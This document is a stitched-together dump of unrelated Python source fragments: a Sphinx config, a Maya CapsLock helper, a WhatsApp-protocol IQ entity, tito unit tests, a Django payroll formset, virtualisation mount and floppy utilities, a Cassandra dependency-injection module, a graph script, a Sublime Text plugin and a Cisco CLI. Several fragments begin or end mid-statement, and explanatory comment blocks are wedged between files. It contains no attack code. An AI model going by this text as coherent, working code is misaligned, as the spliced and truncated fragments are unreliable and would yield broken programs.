autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_trees = ['_templates'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. #pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. 
#html_theme = 'default' # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = '_static/logo.png' # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. html_favicon = '_static/icon.ico' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'HelixMCdoc' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [( 'index', 'HelixMC.tex', u'HelixMC Documentation', u'Fang-Chie
h Chou', 'manual' )] # The name of an image file (relative to this directory) to place at the top of # the title page. latex_logo = '_static/logo.png' # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as
an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output -------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'helixmc', u'HelixMC Documentation',
     [u'Fang-Chieh Chou'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output -----------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [(
    'index', 'HelixMC', u'HelixMC Documentation', u'Fang-Chieh Chou',
    'HelixMC', 'One line description of project.', 'Miscellaneous'
)]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

trim_doctest_flags = True
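# ---------------------------------------------------------------------------
# Usage note (illustrative, not part of the configuration above): a conf.py
# like this one is consumed by sphinx-build. Assuming this file sits in the
# documentation source directory and _build/html is the desired output path:
#
#   sphinx-build -b html . _build/html
#
# Because autodoc/autosummary are enabled and `import helixmc` is executed
# above, the helixmc package must be importable when that command runs.
# ---------------------------------------------------------------------------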
from syzoj.mo
dels import JudgeState from syzoj import db db.create_all() all_judge = JudgeState.query.all() for item in all_judge: item.update_usera
c_info()
import subprocess as Subprocess import pymel.all as pm class CapsDisabler(object): def __init__(self, parentRef, go=False): self.parentRef = parentRef self.ini = self.parentRef.ini sel
f.conf = self.ini.conf self.enabled = False
        self.autohotkeyProcess = None
        if go:
            self.go()

    def go(self):
        try:
            if int(self.ini.getItem("disable_capslock")) == 1:
                self.enabled = True
            else:
                #print("Hotkeys not enabled.")
                pass
        except Exception:
            print("\n    Could not start CapsLock disabling system or could "
                  "not find info on its configuration, perhaps because of "
                  "missing info in the ini file. \n")

        if self.enabled:
            self.disableCapslock()

    def killAutohotkeyProcess(self):
        # Stop the AutoHotkey helper process if one was started earlier.
        if isinstance(self.autohotkeyProcess, Subprocess.Popen):
            try:
                self.autohotkeyProcess.kill()
            except Exception:
                print("Autohotkey process not stopped.  Perhaps it had "
                      "not been started.")
        self.autohotkeyProcess = None

    def disableCapslock(self):
        # Restart the AutoHotkey helper that disables CapsLock.
        self.killAutohotkeyProcess()
        self.autohotkeyProcess = Subprocess.Popen(
            self.parentRef.env.conf.autohotkey_command )

    def startDisablingCapslock(self):
        self.disableCapslock()

    def stopDisablingCapslock(self):
        self.killAutohotkeyProcess()

    def setDisableCapslockOn(self):
        print( "pretending to set disable_capslock to ON" )
        #self.ini.setItem( disable_capslock, 1 )  ##untested code
        pass

    def setDisableCapslockOff(self):
        print( "pretending to set disable_capslock to OFF" )
        #self.ini.setItem( disable_capslock, 0 )
        pass
from yowsup.structs import ProtocolEntity, ProtocolTreeNode class IqProtocolEntity(ProtocolEntity): ''' <iq type="{{get | set}}" id="{{id}}" xmlns="{{xmlns}}" to="{{TO}}" from="{{FROM}}"> </iq> ''' TYPE_SET = "set" TYPE_GET = "get" TYPE_ERROR = "error" TYPE_RESULT = "result" TYPE_DELETE = "delete" TYPES = (TYPE_SET, TYPE_GET, TYPE_RESULT, TYPE_ERROR, TYPE_DELETE) def __init__(self, xmlns = None, _id = None, _type = None, to = None, _from = None): super(IqProtocolEntity, self).__init__("iq") assert _type in self.__class__.TYPES, "Iq of type %s is not implemented, can accept only (%s)" % (_type," | ".join(self.__class__.TYPES)) assert not to or not _from, "Can't set from and to at the same time" self._id = self._generateId(True) if _id is None else _id self._from = _from self._type = _type self.xmlns = xmlns self.to = to def getId(self): return self._id def getType(self): return self._type def getXmlns(self): return self.xmlns def getFrom(self, full = True): return self._from if
full else self._from.split('@')[0] def getTo(self): return self.to def toProtocolTreeNode(self): attribs = { "id" : self._id, "type" : self._type
} if self.xmlns: attribs["xmlns"] = self.xmlns if self.to: attribs["to"] = self.to elif self._from: attribs["from"] = self._from return self._createProtocolTreeNode(attribs, None, data = None) def __str__(self): out = "Iq:\n" out += "ID: %s\n" % self._id out += "Type: %s\n" % self._type if self.xmlns: out += "xmlns: %s\n" % self.xmlns if self.to: out += "to: %s\n" % self.to elif self._from: out += "from: %s\n" % self._from return out @staticmethod def fromProtocolTreeNode(node): return IqProtocolEntity( node.getAttributeValue("xmlns"), node.getAttributeValue("id"), node.getAttributeValue("type"), node.getAttributeValue("to"), node.getAttributeValue("from") )
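# ---------------------------------------------------------------------------
# A minimal round-trip sketch for the entity above (illustrative only, not part
# of yowsup); the xmlns and the destination jid are placeholder values.
if __name__ == "__main__":
    ping = IqProtocolEntity(xmlns="w:p", _type=IqProtocolEntity.TYPE_GET,
                            to="s.whatsapp.net")
    node = ping.toProtocolTreeNode()                       # entity -> tree node
    rebuilt = IqProtocolEntity.fromProtocolTreeNode(node)  # tree node -> entity
    print(rebuilt)   # same id / type / xmlns / to as `ping`
# ---------------------------------------------------------------------------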
import unittest from tito.buildparser import BuildTargetParser from ConfigParser import ConfigParser from tito.exception import TitoException class BuildTargetParserTests(unittest.TestCase): def setUp(self): unittest.TestCase.setUp(self) self.valid_branches = ["branch1", "branch2"] self.release_target = "project-x.y.z" self.releasers_config = ConfigParser() self.releasers_config.add_section(self.release_target) self.releasers_config.set(self.release_target, "build_targets", "branch1:project-x.y.z-candidate") def test_parser_gets_correct_targets(self): parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) release_targets = parser.get_build_targets() self.assertTrue("branch1" in release_targets) self.assertEqual("project-x.y.z-candidate", release_targets["branch1"]) self.assertFalse("branch2" in release_targets) def test_invalid_branch_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets",
"invalid-branch:project-x.y.z-candidate") parser = BuildTargetParser(self.releasers_config, self.rele
ase_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_missing_semicolon_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets", "invalid-branchproject-x.y.z-candidate") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_empty_branch_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets", ":project-x.y.z-candidate") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_empty_target_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets", "branch1:") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_multiple_spaces_ok(self): self.releasers_config.set(self.release_target, "build_targets", " branch1:project-x.y.z-candidate ") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) release_targets = parser.get_build_targets() self.assertEqual(1, len(release_targets)) self.assertTrue("branch1" in release_targets) self.assertEqual("project-x.y.z-candidate", release_targets["branch1"]) def test_multiple_branches_supported(self): self.releasers_config.set(self.release_target, "build_targets", "branch1:project-x.y.z-candidate branch2:second-target") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) release_targets = parser.get_build_targets() self.assertEquals(2, len(release_targets)) self.assertTrue("branch1" in release_targets) self.assertEqual("project-x.y.z-candidate", release_targets["branch1"]) self.assertTrue("branch2" in release_targets) self.assertEqual("second-target", release_targets['branch2'])
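# ---------------------------------------------------------------------------
# Not the tito implementation -- just a compact sketch of the
# "git-branch:koji-target" contract that the tests above exercise.
# parse_build_targets is a hypothetical helper name introduced here.
def parse_build_targets(value, valid_branches):
    """Parse a whitespace separated list of "branch:target" pairs."""
    targets = {}
    for token in value.split():
        branch, sep, target = token.partition(":")
        if not sep or not branch or not target:
            raise ValueError("malformed build_target entry: %r" % token)
        if branch not in valid_branches:
            raise ValueError("unknown branch: %r" % branch)
        targets[branch] = target
    return targets

# parse_build_targets("branch1:project-x.y.z-candidate", ["branch1", "branch2"])
# -> {"branch1": "project-x.y.z-candidate"}
# ---------------------------------------------------------------------------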
from django.forms.formsets import BaseFormSet, formset_factory from django.forms.models import BaseModelFormSet from django.forms.models import modelformset_factory from django import forms from models import PlanillaHistoricas, ConceptosFolios, Folios, Tomos class PlanillaHistoricasForm(forms.Form): codi_empl_per = forms.CharField(max_length=50, widget=forms.TextInput(attrs={'class': 'nombre', 'placeholder': 'Apellidos y Nombres'})) desc_plan_stp = forms.CharField(max_length=200, widget=forms.Textarea(attrs={'rows': 1})) def __init__(self, concepto, *args, **kwargs): super(PlanillaHistoricasForm, self).__init__(*args, **kwargs) campos = dict() egr = 'border-color: #e9322d; -webkit-box-shadow: 0 0 6px #f8b9b7; -moz-box-shadow: 0 0 6px #f8b9b7; box-shadow: 0 0 6px #f8b9b7;'; ing = 'border-color: #2D78E9; -webkit-box-shadow: 0 0 6px #2D78E9; -moz-box-shadow: 0 0 6px #2D78E9; box-shadow: 0 0 6px #2D78E9;'; total = 'border-color: rgb(70, 136, 71); -webkit-box-shadow: 0 0 6px rgb(70, 136, 71); -moz-box-shadow: 0 0 6px rgb(70, 136, 71); box-shadow: 0 0 6px rgb(70, 136, 71);'; for conc in concepto: codigo = conc.codi_conc_tco.codi_conc_tco descripcion = conc.codi_conc_tco.desc_cort_tco tipo = conc.codi_conc_tco.tipo_conc_tco clase = 'remuneraciones' if codigo == 'C373' else 'descuentos' if codigo == 'C374' else 'total' if codigo == 'C12' else 'monto' attrs = { 'class': clase + ' error', 'data-title': descripcion, 'data-tipo': tipo, 'style': 'width:auto;font-size:15px;' + (ing if tipo == '1' else egr if tipo == '2' else total if codigo in ('C373', 'C12', 'C374') else ''), 'maxlength': 35, 'placeholder': descripcion } if codigo in campos: campos[codigo] += 1 else:
campos[codigo] = 1 index = campos[codigo] flag = '_%s' % index self.fields['%s%s' % (codigo, flag)] = forms.CharField(widget=forms.TextInput(attrs=attrs)) self.fields['codigos'] = forms.Ch
arField(max_length=700, widget=forms.HiddenInput()) class BasePlanillaHistoricasFormSet(BaseFormSet): def __init__(self, *args, **kwargs): self.concepto = kwargs['concepto'] del kwargs['concepto'] super(BasePlanillaHistoricasFormSet, self).__init__(*args, **kwargs) def _construct_form(self, i, **kwargs): kwargs['concepto'] = self.concepto return super(BasePlanillaHistoricasFormSet, self)._construct_form(i, **kwargs) def add_fields(self, form, index): super(BasePlanillaHistoricasFormSet, self).add_fields(form, index) PlanillaHistoricasFormSet = formset_factory(#form=PlanillaHistoricasForm, form=PlanillaHistoricasForm, formset=BasePlanillaHistoricasFormSet, extra=0, can_delete=False) #exclude=('id', ))
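# ---------------------------------------------------------------------------
# A minimal view-side usage sketch (illustrative only): the extra `concepto`
# keyword accepted by BasePlanillaHistoricasFormSet above is forwarded to every
# PlanillaHistoricasForm through _construct_form. The argument names
# `conceptos` and `filas_iniciales` are placeholders for this example.
def _ejemplo_uso(request, conceptos, filas_iniciales):
    if request.method == 'POST':
        formset = PlanillaHistoricasFormSet(request.POST, concepto=conceptos)
        if formset.is_valid():
            datos = [form.cleaned_data for form in formset]
            return datos  # persist as needed
    else:
        formset = PlanillaHistoricasFormSet(initial=filas_iniciales,
                                            concepto=conceptos)
    return formset
# ---------------------------------------------------------------------------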
t in mount_result.splitlines(): if mount_str in result: if options: options = options.split(",") options_result = result.split()[3].split(",") for op in options: if op not in options_result: if verbose: logging.info("%s is not mounted with given" " option %s", src, op) return False if verbose: logging.info("%s is mounted", src) return True if verbose: logging.info("%s is not mounted", src) return False def mount(src, dst, fstype=None, opti
ons=None, verbose=False, session=None): """ Mount src under dst if
it's really mounted, then remout with options. :param src: source device or directory :param dst: mountpoint :param fstype: filesystem type need to mount :param options: mount options :param session: mount within the session if given :return: if mounted return True else return False """ options = (options and [options] or [''])[0] if is_mount(src, dst, fstype, options, verbose, session): if 'remount' not in options: options = 'remount,%s' % options cmd = ['mount'] if fstype: cmd.extend(['-t', fstype]) if options: cmd.extend(['-o', options]) cmd.extend([src, dst]) cmd = ' '.join(cmd) if session: return session.cmd_status(cmd, safe=True) == 0 return process.system(cmd, verbose=verbose) == 0 def umount(src, dst, fstype=None, verbose=False, session=None): """ Umount src from dst, if src really mounted under dst. :param src: source device or directory :param dst: mountpoint :param fstype: fstype used to check if mounted as expected :param session: umount within the session if given :return: if unmounted return True else return False """ mounted = is_mount(src, dst, fstype, verbose=verbose, session=session) if mounted: from . import utils_package package = "psmisc" # check package is available, if not try installing it if not utils_package.package_install(package): logging.error("%s is not available/installed for fuser", package) fuser_cmd = "fuser -km %s" % dst umount_cmd = "umount %s" % dst if session: session.cmd_output_safe(fuser_cmd) return session.cmd_status(umount_cmd, safe=True) == 0 process.system(fuser_cmd, ignore_status=True, verbose=True, shell=True) return process.system(umount_cmd, ignore_status=True, verbose=True) == 0 return True @error_context.context_aware def cleanup(folder): """ If folder is a mountpoint, do what is possible to unmount it. Afterwards, try to remove it. :param folder: Directory to be cleaned up. """ error_context.context( "cleaning up unattended install directory %s" % folder) umount(None, folder) if os.path.isdir(folder): shutil.rmtree(folder) @error_context.context_aware def clean_old_image(image): """ Clean a leftover image file from previous processes. If it contains a mounted file system, do the proper cleanup procedures. :param image: Path to image to be cleaned up. """ error_context.context("cleaning up old leftover image %s" % image) if os.path.exists(image): umount(image, None) os.remove(image) class Disk(object): """ Abstract class for Disk objects, with the common methods implemented. """ def __init__(self): self.path = None def get_answer_file_path(self, filename): return os.path.join(self.mount, filename) def copy_to(self, src): logging.debug("Copying %s to disk image mount", src) dst = os.path.join(self.mount, os.path.basename(src)) if os.path.isdir(src): shutil.copytree(src, dst) elif os.path.isfile(src): shutil.copyfile(src, dst) def close(self): os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH) cleanup(self.mount) logging.debug("Disk %s successfully set", self.path) class FloppyDisk(Disk): """ Represents a floppy disk. We can copy files to it, and setup it in convenient ways. 
""" @error_context.context_aware def __init__(self, path, qemu_img_binary, tmpdir, vfd_size): error_context.context( "Creating unattended install floppy image %s" % path) self.mount = tempfile.mkdtemp(prefix='floppy_virttest_', dir=tmpdir) self.path = path self.vfd_size = vfd_size clean_old_image(path) try: c_cmd = '%s create -f raw %s %s' % (qemu_img_binary, path, self.vfd_size) process.run(c_cmd, verbose=DEBUG) f_cmd = 'mkfs.msdos -s 1 %s' % path process.run(f_cmd, verbose=DEBUG) except process.CmdError as e: logging.error("Error during floppy initialization: %s" % e) cleanup(self.mount) raise def close(self): """ Copy everything that is in the mountpoint to the floppy. """ pwd = os.getcwd() try: os.chdir(self.mount) path_list = glob.glob('*') for path in path_list: self.copy_to(path) finally: os.chdir(pwd) cleanup(self.mount) def copy_to(self, src): logging.debug("Copying %s to floppy image", src) mcopy_cmd = "mcopy -s -o -n -i %s %s ::/" % (self.path, src) process.run(mcopy_cmd, verbose=DEBUG) def _copy_virtio_drivers(self, virtio_floppy): """ Copy the virtio drivers on the virtio floppy to the install floppy. 1) Mount the floppy containing the viostor drivers 2) Copy its contents to the root of the install floppy """ pwd = os.getcwd() try: m_cmd = 'mcopy -s -o -n -i %s ::/* %s' % ( virtio_floppy, self.mount) process.run(m_cmd, verbose=DEBUG) finally: os.chdir(pwd) def setup_virtio_win2003(self, virtio_floppy, virtio_oemsetup_id): """ Setup the install floppy with the virtio storage drivers, win2003 style. Win2003 and WinXP depend on the file txtsetup.oem file to install the virtio drivers from the floppy, which is a .ini file. Process: 1) Copy the virtio drivers on the virtio floppy to the install floppy 2) Parse the ini file with config parser 3) Modify the identifier of the default session that is going to be executed on the config parser object 4) Re-write the config file to the disk """ self._copy_virtio_drivers(virtio_floppy) txtsetup_oem = os.path.join(self.mount, 'txtsetup.oem') if not os.path.isfile(txtsetup_oem): raise IOError('File txtsetup.oem not found on the install ' 'floppy. Please verify if your floppy virtio ' 'driver image has this file') parser = ConfigParser.ConfigParser() parser.read(txtsetup_oem) if not parser.has_section('Defaults'): raise ValueError('File txtsetup.oem does not have the session ' '"Defaults". Please check txtsetup.oem') default_driver = parser.get('Defaults', 'SCSI') if default_driver != virtio_oemsetup_id: parser.set('Defaults', 'SCSI', virtio_oemsetup_id) fp = open(txtsetup_oem, 'w') parser.write(fp) fp.close() def setup_virtio_win2008(self, virtio_floppy): """ Setup the install floppy with the virtio storage drivers, win2008 style. Win2008, Vista and 7 require people to point out the path to the drivers on the unattended file, so we just need to copy the drivers to the driver floppy disk. Importan
from injector import Module from cassandra.cqlengine import connection from cassandra.cluster import Cluster from cassandra.cqlengine.management import create_keyspace_simple, sync_table, sync_type from cassandra.cqlengine.usertype import UserType from ...entities.track_type import TrackType from cassandra_users_repository import CassandraUsersRepository from cassandra_spots_repository import CassandraSpotsRepository from runs.cassandra_runs_repository import CassandraRunsRepository from cassandra_checkpoint_passes_repository import CassandraCheckpointPassesRepository from ..repositories_definitions import UsersRepository from ..repositories_definitions import SpotsRepository from ..repositories_definitions import RunsRepository from ..repositories_definitions import CheckpointPassesRepository class CassandraRepositoriesModule(Module): def configure(self, binder): connection.setup(['cassandrahost'], 'biketimer', protocol_version=4) cluster = Cluster(['cassandrahost']) session = cluster.connect('biketimer') users_repository_instance = CassandraUsersRepository(cluster, session) binder.bind(UsersReposito
ry, to=users_repository_instance)
spots_repository_instance = CassandraSpotsRepository(cluster, session) binder.bind(SpotsRepository, to=spots_repository_instance) runs_repository_instance = CassandraRunsRepository(cluster, session) binder.bind(RunsRepository, to=runs_repository_instance) checkpoint_passes_repository_instance = CassandraCheckpointPassesRepository(cluster, session) binder.bind(CheckpointPassesRepository, to=checkpoint_passes_repository_instance)
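# ---------------------------------------------------------------------------
# A minimal usage sketch (illustrative only), relying on the standard injector
# API: build an Injector from the module above and let it resolve one of the
# bound repository interfaces. Note that configure() opens the Cassandra
# connection eagerly, so a reachable cluster is required when this runs.
from injector import Injector

def _example_container():
    container = Injector([CassandraRepositoriesModule()])
    users_repository = container.get(UsersRepository)  # the bound Cassandra instance
    return users_repository
# ---------------------------------------------------------------------------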
import sys, math # **************** Main program ********************************************* def main(): # File IO ############################################### txt = open("in9.txt", 'r') N = int (txt.readline()) n = 2 * N a = [[0 for x in range(1)] for y in range(n)] # print >> sys.stderr, a print >> sys.stderr, "N=", N for line in range (0, N): x , y = [int(j) for j in txt.readline().split()] #print >> sys.stderr, '%d %d' % (x, y) m, n = sortTwo(x, y) a[m].append(n) a[n].append(m) a[m][0] += 1 a[n][0] += 1 print >> sys.stderr, "Done file IO \n \n" ############################################################## # Init vars------------------------------------------------- #print >> sys.stderr, a while (a[-1]==[0]): # check for abundant [0] a.pop() relationship = a n = len(relationship) print >> sys.stderr, "total nodes:" , n level = [0] * n # contains level of nodes # print >> sys.stderr, level #print >> sys.stderr, "relationship: \n" , relationship countOne = 0 oneList = [] for elem in range(0, n): if (relationship[elem][0] == 1): countOne += 1 oneList.a
ppend(elem) print >> sys.stderr, "countONe:", countOne # print >> sys.stderr,"oneList:", oneList print >> sys.stderr, "Done Var init \n \n" # ------------------------------------------------------------- # Engine --------------------------------------------------- for i in range(0, countOne):
node = oneList[i] level[i] = findSingleMaxLength(node, node, oneList, countOne, relationship, n) # ------------------------------------------------------------ # Report ------------------------------------------------- #--------------------------------------------------------- # No touch area ------------------------------------------ maxi = max(level) if (maxi % 2 == 0): ans = maxi / 2 else: ans = (maxi + 1) / 2 print >> sys.stderr, "Answer:", ans #*********************** End program ************************************************ def spreadRumorNode(node, relationship, relationship_len): # update relationship and provide bag bag = [] new_relationship = relationship if (new_relationship[node][0] > 0): for bag_elem in range (1, 1 + relationship[node][0]): node_child = relationship[node][bag_elem] if (relationship[node_child][0] > 0): bag.append(node_child) new_relationship[node][0] = -2 return bag, new_relationship def spreadRumorOnce(target_list, relationship, relationship_len): new_target_list = [] new_relationship = relationship number_of_target = len(target_list) target_bag = [[] for y in range(number_of_target)] for i in range(number_of_target): node = target_list[i] target_bag[i], new_relationship = spreadRumorNode(node, new_relationship, relationship_len) new_target_list.extend(target_bag[i]) return new_target_list, new_relationship def findSingleMaxLength(x, x_pos, oneList, oneList_len, relationship, relationship_len): new_relationship = relationship step = -1 try: i = oneList.index(x) except ValueError: return -1 # no match nowhere_to_go = 0 target_list = [x] while (nowhere_to_go == 0): step += 1 target_list, new_relationship = spreadRumorOnce(target_list, new_relationship, relationship_len) if (target_list == []): nowhere_to_go = 1 return step def findMin(a, b): res = a if (res > b): res = b return res def sortTwo(a, b): if (a < b): x = a y = b else: x = b y = a return x, y main()
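# ---------------------------------------------------------------------------
# The level-by-level "spread the rumor" loop above is a breadth-first search in
# disguise. For reference (not part of the original script), the same distance
# computation over an adjacency-list graph with collections.deque:
from collections import deque

def eccentricity(adj, start):
    """Longest shortest-path distance from `start` in an unweighted graph.

    `adj` maps each node to an iterable of its neighbours.
    """
    dist = {start: 0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for neighbour in adj[node]:
            if neighbour not in dist:
                dist[neighbour] = dist[node] + 1
                queue.append(neighbour)
    return max(dist.values())

# eccentricity({0: [1], 1: [0, 2], 2: [1]}, 0) -> 2
# ---------------------------------------------------------------------------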
import time import sublime import sublime_plugin ST3 = int(sublime.version()) >= 3000 if ST3: from .view_collection im
port ViewCollection from .git_gutter_popup import show_diff_popup else: from view_collection import ViewCollection from git_gutter_popup import show_diff_popup def async_event_listener(EventListe
ner): if ST3: async_methods = set([ 'on_new', 'on_clone', 'on_load', 'on_pre_save', 'on_post_save', 'on_modified', 'on_selection_modified', 'on_activated', 'on_deactivated', ]) for attr_name in dir(EventListener): if attr_name in async_methods: attr = getattr(EventListener, attr_name) setattr(EventListener, attr_name + '_async', attr) delattr(EventListener, attr_name) return EventListener @async_event_listener class GitGutterEvents(sublime_plugin.EventListener): def __init__(self): self._settings_loaded = False self.latest_keypresses = {} # Synchronous def on_modified(self, view): if self.settings_loaded() and self.live_mode: self.debounce(view, 'modified', ViewCollection.add) def on_clone(self, view): if self.settings_loaded(): self.debounce(view, 'clone', ViewCollection.add) def on_post_save(self, view): if self.settings_loaded(): self.debounce(view, 'post-save', ViewCollection.add) def on_load(self, view): if self.settings_loaded() and self.live_mode: self.debounce(view, 'load', ViewCollection.add) def on_activated(self, view): if self.settings_loaded() and self.focus_change_mode: self.debounce(view, 'activated', ViewCollection.add) def on_hover(self, view, point, hover_zone): if hover_zone != sublime.HOVER_GUTTER: return # don't let the popup flicker / fight with other packages if view.is_popup_visible(): return if not settings.get("enable_hover_diff_popup"): return show_diff_popup(view, point, flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY) # Asynchronous def debounce(self, view, event_type, func): if self.non_blocking: key = (event_type, view.file_name()) this_keypress = time.time() self.latest_keypresses[key] = this_keypress def callback(): latest_keypress = self.latest_keypresses.get(key, None) if this_keypress == latest_keypress: func(view) if ST3: set_timeout = sublime.set_timeout_async else: set_timeout = sublime.set_timeout set_timeout(callback, settings.get("debounce_delay")) else: func(view) # Settings def settings_loaded(self): if settings and not self._settings_loaded: self._settings_loaded = self.load_settings() return self._settings_loaded def load_settings(self): self.live_mode = settings.get('live_mode') if self.live_mode is None: self.live_mode = True self.focus_change_mode = settings.get('focus_change_mode') if self.focus_change_mode is None: self.focus_change_mode = True self.non_blocking = settings.get('non_blocking') if self.non_blocking is None: self.non_blocking = True return True settings = {} def plugin_loaded(): global settings settings = sublime.load_settings('GitGutter.sublime-settings') if not ST3: plugin_loaded()
# Copyright (c) 2016 Cisco Systems # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import click from aim import config as aim_cfg from aim import context from aim.db import api from aim.tools.cli.groups import aimcli @aimcli.aim.group(name='config') @click.pass_context def config(ctx): aim_ctx = context.AimContext(store=api.get_store(expire_on_commit=True)) ctx
.obj['manager'] = aim_cfg.ConfigManager(aim_ctx, '') @config.comm
and(name='update')
@click.argument('host', required=False)
@click.pass_context
def update(ctx, host):
    """Write the loaded configuration to the database for the given host."""
    host = host or ''
    ctx.obj['manager'].to_db(ctx.obj['conf'], host=host)


@config.command(name='replace')
@click.argument('host', required=False)
@click.pass_context
def replace(ctx, host):
    """Replace all stored configuration in the database for the given host."""
    host = host or ''
    ctx.obj['manager'].replace_all(ctx.obj['conf'], host=host)
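# ---------------------------------------------------------------------------
# Example invocations (illustrative; assumes this package's console script is
# installed as `aim`). The HOST argument is optional in both commands, as
# declared above:
#
#   aim config update              # write the loaded configuration to the DB
#   aim config update host-1       # same, scoped to host-1
#   aim config replace host-1      # replace all stored configuration for host-1
# ---------------------------------------------------------------------------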